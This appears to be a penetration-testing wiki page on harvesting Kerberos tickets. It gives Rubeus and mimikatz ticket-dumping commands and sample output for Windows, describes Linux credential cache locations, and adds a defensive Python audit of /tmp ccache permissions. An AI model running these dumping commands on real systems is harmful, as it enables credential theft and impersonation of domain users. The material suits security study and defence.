# 88 - Kerberos

## Harvest tickets from Windows

Rubeus `triage` lists the Kerberos tickets in all the logon sessions currently on a system. If you're not in an elevated state, it can only show tickets in your own logon session.

```text
C:\Tools\Rubeus\Rubeus\bin\Debug> Rubeus.exe triage
 ------------------------------------------------------------------------------------------------------------------ 
 | LUID     | UserName                    | Service                                       | EndTime               |
 ------------------------------------------------------------------------------------------------------------------ 
 | 0x79474  | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:13:03 PM |
 | 0x3e4    | srv-1$ @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:11:00 PM |
 | 0x1f8cd  | jking @ DEV.CYBERBOTIC.IO   | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:10:56 PM |
```

```
# Using mimikatz
sekurlsa::tickets /export
# Dump all tickets with Rubeus
.\Rubeus dump
# Save a base64-encoded ticket to a .kirbi file (PowerShell)
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
```

## Harvest tickets from Linux

On Linux, **tickets are stored in credential caches (ccaches)**. There are 3 main types, which indicate where **tickets can be found**:

* **Files**, by default under the **/tmp** directory, in the form of **krb5cc\_%{uid}**.
* **Kernel Keyrings**, a special space in the Linux kernel provided for storing keys.
* **Process memory,** used when only one process needs to use the tickets.
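
A defender-side check for the file-based caches listed above, as an added example that is not part of the original page: it flags `krb5cc_*` files whose mode or owner would let another local user read the tickets. The function name, and the rule that the number in the file name should equal the owning uid, are assumptions of this example.

```python
import os
import re
import stat

# Default FILE ccache naming from the list above: krb5cc_%{uid}, optionally
# followed by a suffix (e.g. krb5cc_1000_AbCdEf).
CCACHE_RE = re.compile(r"^krb5cc_(\d+)")


def audit_ccache_dir(directory="/tmp"):
    """Return (path, problem) tuples for file ccaches with risky owner or mode.

    Hypothetical helper for this example, not part of any Kerberos tooling.
    """
    findings = []
    for name in sorted(os.listdir(directory)):
        match = CCACHE_RE.match(name)
        if not match:
            continue
        path = os.path.join(directory, name)
        st = os.lstat(path)  # lstat: do not follow a symlink planted in /tmp
        if not stat.S_ISREG(st.st_mode):
            findings.append((path, "not a regular file"))
            continue
        if st.st_mode & 0o077:
            # Any group/other bit means someone besides the owner can reach the tickets.
            findings.append((path, "accessible by group or other"))
        if st.st_uid != int(match.group(1)):
            # Assumption: the uid in the name should be the uid that owns the file.
            findings.append((path, "owner differs from uid in file name"))
    return findings


if __name__ == "__main__":
    for path, problem in audit_ccache_dir("/tmp"):
        print(f"{path}: {problem}")
```

Caches held in kernel keyrings or process memory do not appear in `/tmp`, so this check covers only the first of the three types.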
